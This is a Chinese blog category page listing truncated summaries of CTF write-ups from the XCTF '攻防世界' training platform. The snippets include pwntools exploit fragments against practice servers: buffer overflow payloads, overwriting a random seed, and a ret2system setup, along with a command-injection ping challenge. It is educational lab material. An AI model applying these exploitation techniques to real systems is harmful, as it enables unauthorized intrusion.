随笔分类 - 攻防世界
摘要:查源码发现v5可以覆盖sreed[0],这样这个随机数列就可控了 在随机种子这里我一开始使用devC++来生成,居然结果跟gcc的不一样
阅读全文
摘要:#encoding=utf-8 #!usr/bin/python from pwn import * io = remote('111.198.29.45',42643) io.recvuntil("secret[0] is ") # recvuntil(some_string) 接收到 some_
阅读全文
摘要:# ! /usr/bin/env python # -*- coding:utf-8 -*- from pwn import * context.log_level = 'debug' elf = ELF('leve2') sys_addr = elf.symbols['system'] sh_ad
阅读全文
摘要:先反编译 : int __cdecl main(int argc, const char **argv, const char **envp) { write(1, "Hello, World\n", 0xDuLL); return vulnerable_function(); } 追踪一下 "vu
阅读全文
摘要:看样子是要让我们通过read(0, &unk_601068, 0x10uLL),读入 unk_601068 将 dword_60106C 覆盖 6c-68=4,所以: from pwn import * io = remote("111.198.29.45",45604) payload = "A"
阅读全文
摘要:所以题目要求是输入生日1926 payload: from pwn import * io = remote("111.198.29.45",40803) io.recvline() io.sendline('1234') io.recvline() payload = "A"*8 payload
阅读全文
摘要:这题算是一次复现,虽然师傅们的wp已经很详细了但是对于我菜虚困来说还是有些点不是很懂,所以特此梳理一下思路 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7E
阅读全文
摘要:来自攻防世界官方WP | darkless师傅版本 题目描述 抓住那只猫 思路 打开页面,有个输入框输入域名,输入baidu.com进行测试 发现无任何回显,输入127.0.0.1进行测试。 发现已经执行成功,执行的是一个ping命令,一开始想的应该是命令拼接执行,但是输入任何有关拼接的字符串都会提
阅读全文